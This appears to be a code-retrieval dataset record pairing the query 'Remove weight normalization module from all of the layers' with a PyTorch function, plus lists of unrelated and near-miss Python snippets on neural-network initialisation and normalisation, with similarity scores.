self.shifts2 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n hklIp3[:,-1], self.shifts3 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n\n # retain subset of Millers\n for data in [hklIp1,hklIp2,hklIp3]:\n keep_idx = np.unique(np.random.randint(0, high=data.shape[0], size=args['size']))\n data = data[keep_idx]\n \n self.data1, self.data2, self.data3 = hklIp1, hklIp2, hklIp3\n fshifts_list = np.random.uniform(size=(4,3))\n self.fshifts_list = np.vstack((fshifts_list, 1-self.shifts2, 1-self.shifts3))", "def setup(self):\n for gen in self._generators:\n gen.setup()", "def _init_anim(self):\n pass", "def __init__(self, *args, **kwargs):\n _gdi_.Palette_swiginit(self,_gdi_.new_Palette(*args, **kwargs))", "def __init__(self):\n self.model = {'mol':[], 'nmol':0}\n self.template = {} \n self.config = {}\n 
self.config['tfile'] = 'gau-template-bsse.gjf'\n self.config['xyzfile'] = 'model.xyz'\n self.config['jobfile'] = 'gau.gjf'\n self.config['job_prefix'] = self.config['jobfile'].split(\".\")[0]\n self.config['incr'] = 1\n \n self.rd_cmd_stream()\n return", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def __init__(self, opt: argparse.Namespace) -> None:\n super().__init__(opt)\n\n self.gpu_ids = opt.gpu_ids\n self.is_train = opt.is_train\n self.output_nch = opt.output_nch\n self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu')\n\n # generator module\n self._generator_module = generator_modules[opt.generator_module_name](opt)\n apply_init_weight(self._generator_module, opt, init_weight=init_weights[opt.init_weight_name])\n if self.is_train:\n # discriminator module\n self._discriminator_module = discriminator_modules[opt.discriminator_module_name](opt)\n apply_init_weight(self._discriminator_module, opt, init_weight=init_weights[opt.init_weight_name])\n # generator optimizer\n self._generator_optimizer = optimizers[opt.generator_optimizer_name](self._generator_module.parameters(), opt)\n # discriminator optimizer\n self._discriminator_optimizer = optimizers[opt.discriminator_optimizer_name](self._discriminator_module.parameters(), opt)\n # generator scheduler\n self._generator_scheduler = schedulers[opt.generator_scheduler_name](self._generator_optimizer, opt)\n # discriminator scheduler\n self._discriminator_scheduler = schedulers[opt.discriminator_scheduler_name](self._discriminator_optimizer, opt)\n\n # register\n if not self.is_train:\n self.modules['generator'] = self._generator_module\n else:\n self.modules['generator'] = self._generator_module\n self.modules['discriminator'] = self._discriminator_module\n self.optimizers['generator'] = self._generator_optimizer\n self.optimizers['discriminator'] = self._discriminator_optimizer\n self.schedulers['generator'] = self._generator_scheduler\n self.schedulers['discriminator'] = self._discriminator_scheduler\n\n self.module_transfer_to_device()", "def initialize_trainer(self):\n self.initialize_matrices()\n self.initialize_model()\n self.initialize_optimizers()\n return self", "def __init__(self, model, n_pix=1, strategy='rand1bin', max_iter=100, popsize=400,\n init='normal', target=None, args=None, **kwargs):\n self.model = model\n self.n_pix = n_pix\n self.strategy = strategy\n self.max_iter = max_iter\n self.popsize = popsize\n self.init = init\n self.target = target\n self.args = args\n self.kwargs = kwargs\n\n self.step_meter = AverageMeter()", "def setUp(self) -> None:\n self.random = np.random.RandomState(seed=42)", "def init(self) -> None:\n ...", "def __init__(self, skin_directory):\n self.ax = None\n self.generate_axis()\n self.skin_directory = skin_directory\n self.figure = plt.gcf()", "def initialise_rng(self):\n\n\t\tself.rng = numpy.random.RandomState()", "def __init__(self, init_pos, init_stdev, num_particles, sense_noise):\n self.particles = np.random.multivariate_normal(\n init_pos, [[init_stdev**2, 0], [0, init_stdev**2]], num_particles)\n self.weights = np.array(\n [1. / num_particles for _ in range(num_particles)])\n self.n = num_particles\n self.sense_noise = sense_noise", "def initialize(self):\n self.gc1.reset_parameters()\n self.gc2.reset_parameters()\n\n for s in self.scores:\n stdv = 1. 
/ math.sqrt(s.size(1))\n s.data.uniform_(-stdv, stdv)\n for b in self.bias:\n # fill in b with postive value to make\n # score s closer to 1 at the beginning\n b.data.fill_(self.bias_init)\n\n for Dk in self.D_k:\n stdv = 1. / math.sqrt(Dk.size(1))\n Dk.data.uniform_(-stdv, stdv)\n\n for b in self.D_bias:\n b.data.fill_(0)", "def setup(self):\n self.star_list = arcade.SpriteList()\n\n for i in range(50):\n # Create snowflake instance\n singlestar = Singlestar()\n # Add snowflake to snowflake list\n self.star_list.append(singlestar)\n\n # Don't show the mouse pointer\n self.set_mouse_visible(False)\n\n # Set the background color\n arcade.set_background_color(arcade.color.BLACK)", "def __init__(self, **kwargs):\n super(VeryCleverBeamsplitter, self).__init__(**kwargs)\n self.shader_source = IL_SHADER_SOURCE\n self.centre = [0.5, 0.5]\n self.blazing_function = np.linspace(0,1,32)\n self.zernike_coefficients = np.zeros(12)", "def __init__(self):\n self.last_reward_pos = 0\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0\n self.stump_spacing = 4.0\n self.stump_height = 1.0\n self.my_init({'leg_length': 35, 'walker_type': 'default'})", "def gff_init():\n pass", "def generate_gazettes(self):\n # TODO: generate_gazettes\n pass", "def __init__(self):\n\t\t# Setup fonts\n\t\tself.large_font = self._get_font(1,Annotator.THICK)\n\t\tself.large_font_outline = self._get_font(1,Annotator.THICK + Annotator.BORDER)\n\t\t\n\t\tself.small_font = self._get_font(0.5,Annotator.THIN)\n\t\tself.small_font_outline = self._get_font(0.5,Annotator.THIN + Annotator.BORDER)\n\t\t\n\t\t# Text colour\n\t\tself.colour = Annotator.COLOUR_BUSY\n\t\t\n\t\tself.forehead = (0,0,1,1)\n\t\tself.face = (0,0,1,1)", "def __init__(self, styles, nature):\n #: Dictionary of key-value pairs, where *keys* are the style names.\n self.styles = styles\n\n #: Cell *nature* used to distinguish the body cells, from the header and the footer.\n self.nature = nature", "def init_model(model):\n model(tf.random.uniform((1, 512, 512, 3)))", "def __init__(self, *args):\n _hypre.HypreBoomerAMG_swiginit(self, _hypre.new_HypreBoomerAMG(*args))", "def init(self):\n sys_init_lines = CodeWriter.write_init()\n self.init_lines.extend(sys_init_lines)", "def feed_parser_initialization(generator):\n\n generator.plugin_instance = GitHubActivity(generator)", "def init(init_state) -> GelmanRubinState:\n n_chains, n_dims = init_state.position.shape\n w_state = w_init(n_chains, n_dims)\n return GelmanRubinState(w_state, 0, jnp.nan)", "def initialize( self, layout, numGhostAgents=1000 ):\n self.data.initialize(layout, numGhostAgents) ##self.data is defined in the Grid() class of game.py REF112.It creates an initial game state from a layout array (see layout.py).", "def __init__(self, generator:Model,\n discriminator:Model,\n latent_dim:Optional[Union[int, Tuple]]=None,\n n_disc:int=3,\n epochs:int=100, \n batch_size:int=32,\n optimizer:Optional[Union[str, Dict]]=None,\n optimizer_kwargs:Optional[Dict]=None,\n name:str='QGAN',\n random_state:Optional[int]=None,\n checkpoint_dir:Optional[str]=None,\n checkpoint_interval:int=10,\n checkpoint_max_to_keep:Optional[int]=None):\n super().__init__(generator=generator,\n discriminator=discriminator,\n latent_dim=latent_dim,\n n_disc=n_disc,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n optimizer_kwargs=optimizer_kwargs,\n name=name,\n random_state=random_state,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=checkpoint_interval,\n checkpoint_max_to_keep=checkpoint_max_to_keep)", "def __init__(\n 
self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def generate(self):\n self.generate_points()\n self.generate_edges()", "def __init__( self, config: 'bittensor.config' = None ):\n if config == None: config = neuron.config()\n self.config = config; neuron.check_config( self.config ); print ( self.config )\n bittensor.logging (\n config = self.config,\n logging_dir = self.config.neuron.full_path,\n )\n self.device = torch.device(\n device = self.config.neuron.device\n )\n self.wallet = bittensor.wallet(\n config = self.config\n )\n self.dendrite = bittensor.dendrite(\n config = self.config,\n wallet = self.wallet\n )\n self.subtensor = bittensor.subtensor(\n config = self.config\n )\n self.metagraph = bittensor.metagraph(\n config = self.config\n )\n self.axon = bittensor.axon (\n config = self.config,\n wallet = self.wallet,\n forward_callback = self.forward,\n backward_callback = self.backward\n )\n self.dataset = bittensor.dataloader (\n config = self.config\n )\n self.router = SGMOERouter(\n config = self.config\n ).to( self.device )\n self.nucleus = GPT2Nucleus(\n config = self.config,\n routing_callback = self.route\n ).to( self.device )\n self.optimizer = torch.optim.SGD(\n [\n {\"params\": self.router.parameters()},\n {\"params\": self.nucleus.parameters()}\n ],\n lr = self.config.neuron.learning_rate,\n weight_decay = self.config.neuron.weight_decay,\n )\n self.tensorboard = SummaryWriter(\n log_dir = self.config.neuron.tensorboard_dir\n )\n self.mechanism_weights = torch.ones( [0] )\n self.epoch = 0\n self.global_step = 0\n self.epoch_loss = math.inf/2\n self.best_epoch_loss = math.inf", "def init_data_generator(config_tuple, data_dir):\n\n (_preprocess_function, flags) = config_tuple\n rescale = 1. 
/ 255 if _preprocess_function is None else None\n image_sizes = (flags.image_width, flags.image_height)\n batch_size = flags.batch_size\n # Configure test generator\n train_datagen = ImageDataGenerator(\n preprocessing_function=_preprocess_function,\n rescale=rescale,\n rotation_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True\n )\n # Configure test data flow\n train_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=image_sizes,\n batch_size=batch_size,\n )\n\n return train_generator", "def __init__(self):\n self.monsters_images = pg.sprite.Group()\n self.font_23 = pg.font.Font(prepare.FONTS['Timeless-Bold'], 23)\n self.font_20 = pg.font.Font(prepare.FONTS['Timeless'], 20)\n self.font_18 = pg.font.Font(prepare.FONTS['Timeless'], 18)\n self.bold_font = pg.font.Font(prepare.FONTS['Timeless-Bold'], 17)\n self.font_15 = pg.font.Font(prepare.FONTS['Timeless'], 15)\n\n self.init_left_zone()\n self.init_middle_zone()\n self.init_right_zone()", "def initialise(self):", "def setUp(self):\n self.G = nx.DiGraph()", "def init(self):", "def init(self):", "def get_generator(upscale_factor, init_gain):\n net = Generator(upscale_factor)\n init_weights(net, 'normal', init_gain)\n return net", "def __init__(self, n, sick_init, social_dist, radius=0.01, styles=None, total_beds=10, box_length=1, recovery_time=1000):\n\n self.init_persons(n, sick_init, social_dist, radius, box_length, recovery_time, total_beds, styles)\n self.init_hospital(total_beds)", "def __init__(self, init_grid=None):\n\n self.height = len(init_grid)\n self.width = len(init_grid[0])\n\n self.grid = [[Cell(self, c) for c in row]\n for row in init_grid]\n\n self.g = nx.Graph()\n self.tangle()", "def run_init(self):\n InitEditor(self.root, self)", "def __init__(self, nn_architecture, seed=99):\n self.nn_architecture = nn_architecture\n self.seed = seed" ]
[ "0.70491105", "0.64428604", "0.637395", "0.6040094", "0.5974412", "0.5972569", "0.59458107", "0.5878243", "0.5834997", "0.58195186", "0.5818394", "0.57847136", "0.5784305", "0.57710445", "0.5760498", "0.57129806", "0.57045466", "0.5686031", "0.56733465", "0.56541693", "0.5648489", "0.56451994", "0.56442606", "0.56295323", "0.5628919", "0.5617335", "0.56137913", "0.5608328", "0.5608047", "0.56037456", "0.5597709", "0.55815846", "0.55487365", "0.5530901", "0.55302197", "0.5528794", "0.55172604", "0.5492429", "0.5491154", "0.5480714", "0.54802424", "0.5479133", "0.5460474", "0.5458128", "0.5455443", "0.5454315", "0.5451266", "0.54501486", "0.5450099", "0.54436934", "0.5438619", "0.54269975", "0.5420654", "0.5420033", "0.5418447", "0.5407051", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.5406016", "0.53843033", "0.5381603", "0.538061", "0.5380021", "0.5371804", "0.53713214", "0.5365139", "0.5352667", "0.5341051", "0.53409266", "0.5334971", "0.532768", "0.5325246", "0.532338", "0.53229016", "0.53167784", "0.5313635", "0.5309547", "0.5300738", "0.52929324", "0.5292666", "0.52908814", "0.5286943", "0.528638", "0.5286195", "0.5282467", "0.52786773", "0.52687025", "0.5266926", "0.5259751", "0.5256807", "0.5256807", "0.525625", "0.52561986", "0.52506745", "0.5247278", "0.52437615" ]
0.0
-1
Remove weight normalization module from all of the layers.
def remove_weight_norm(self): def _remove_weight_norm(m): try: logging.debug(f"Weight norm is removed from {m}.") torch.nn.utils.remove_weight_norm(m) except ValueError: # this module didn't have weight norm return self.apply(_remove_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def remove_activation_hooks(self):\n for h in self.hooks:\n h.remove()\n h = None\n for l in self.list_mods:\n if ('norm' in self.list_mods):\n (b, l) = l\n # Skip non-prunable layers\n if (hasattr(l, 'prune_values')):\n l.prune_values = None\n self.hooks = None", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def remove_batchnorm(m: nn.Sequential) -> None:\n ms = list(m._modules.items())\n\n # transfer biases from BN to previous conv / Linear / Whatever\n for (name1, mod1), (name2, mod2) in zip(ms[:-1], ms[1:]):\n if isinstance(mod2, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n if mod1.bias is not None:\n continue\n\n if mod2.bias is not None:\n with torch.no_grad():\n mod1.bias = mod2.bias\n else:\n out_ch = len(mod2.running_mean)\n with torch.no_grad():\n mod1.bias = nn.Parameter(torch.zeros(out_ch))\n # remove bn\n for name, mod in ms:\n if isinstance(mod, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n delattr(m, name)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def RemoveBatchNormLayers(network, batch_norm_names):\n i = 0\n j = 0\n while i < len(network.layer) and j < len(batch_norm_names): \n if network.layer[i].name == batch_norm_names[j]:\n del network.layer[i]\n j += 1\n else:\n i += 1\n \n if j != len(batch_norm_names):\n print j, len(batch_norm_names)\n raise AssertionError('All batch norm layers were not removed')", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def remove_weight_norm_and_equal_lr(module: Module,\n name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'norm_equal_lr', name)", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, 
mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def reset_weights(self):\n self.head.reset_weights()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def reset(self):\n for layer in self.network:\n layer.clean()", "def remove_weight_scale(module: Module, name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'scale', name)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not None:\n zeros_(m.bias)", "def unfreeeze_all_layers(self):\n # Unfreeeze\n logger.info('MODEL: Unfreeze all layers.')\n for i in range(len(self.model.layers)):\n self.model.layers[i].trainable = True\n \n # Compile model\n logger.info('MODEL: Compiling...')\n self.model.compile(optimizer = Adam(lr=1e-4),\n loss={'yolo_loss': lambda y_true, y_pred: y_pred})", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support 
the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n 
if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_tracking(model, norm_type, norm_power=0.2):\n normlayer = select_norm(norm_type, norm_power=norm_power)\n # find total number of childern\n model_len = 0\n for n, child in enumerate(model.children()):\n model_len = n\n\n # for layer 0 which is outside\n conv_shape = model.conv1.out_channels\n w = model.bn1.weight\n b = model.bn1.bias\n model.bn1 = normlayer(conv_shape)\n model.bn1.weight = w\n model.bn1.bias = b\n\n # replace in all other layers\n for n, child in enumerate(model.children()):\n if 4 <= n <= model_len - 2:\n for i in range(len(child)):\n conv_shape = child[i].conv1.out_channels\n w = child[i].bn1.weight\n b = child[i].bn1.bias\n child[i].bn1 = normlayer(conv_shape)\n child[i].bn1.weight = w\n child[i].bn1.bias = b\n\n conv_shape = child[i].conv2.out_channels\n w = child[i].bn2.weight\n b = child[i].bn2.bias\n child[i].bn2 = normlayer(conv_shape)\n child[i].bn2.weight = w\n child[i].bn2.bias = b\n # if model have bn3 as well\n try:\n conv_shape = child[i].conv3.out_channels\n w = child[i].bn3.weight\n b = child[i].bn3.bias\n child[i].bn3 = normlayer(conv_shape)\n child[i].bn3.weight = w\n child[i].bn3.bias = b\n except:\n pass\n try:\n conv_shape = child[i].downsample[0].out_channels\n w = child[i].downsample[1].weight\n b = child[i].downsample[1].bias\n child[i].downsample[1] = normlayer(conv_shape)\n child[i].downsample[1].weight = w\n child[i].downsample[1].bias = b\n print(\"downsample\")\n except:\n print(\"no downsample\")\n\n return model", "def remove_spectral_norm(module, name='weight'):\n for k, hook in module._forward_pre_hooks.items():\n if isinstance(hook, SpectralNorm) and hook.name == name:\n hook.remove(module)\n del module._forward_pre_hooks[k]\n return module\n\n raise ValueError(\"spectral_norm of '{}' not found in {}\".format(\n name, module))", "def reset_weights(self):\r\n self._weights = deepcopy(self._tmp_weights)\r\n self._tmp_weights = None", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def freeze_model(self):\n # BN layers need to be freezed explicitly since they cannot be freezed via '.requires_grad=False'\n for module in self.modules():\n if isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):\n module.eval()\n \n # freeze all parameters\n for param in self.parameters():\n param.requires_grad = False", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def reset(self):\n self._weights.clear()", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, 
std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_parameters(self) -> None:\n for name, param in self.named_parameters():\n if not (name == 'word_embedding.weight' and self.use_pretrained_embeddings):\n nn.init.normal(param, std=0.1)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def _set_freeze_layers(self):\n for layer in self.encoder.layers[:self.freeze_layers]:\n layer.trainable = False", "def reset_parameters(self):\n model_utils.truncated_normal_(self.weight, mean=0.0, std=0.1)\n model_utils.truncated_normal_(self.bias, mean=0.0, std=0.1)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def set_to_zero_model_weights(model):\n\n for layer_weigths in model.parameters():\n layer_weigths.data.sub_(layer_weigths.data)", "def clear(self):\n for i in range(0, len(self.weights)):\n self.weights[i] = 0", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n 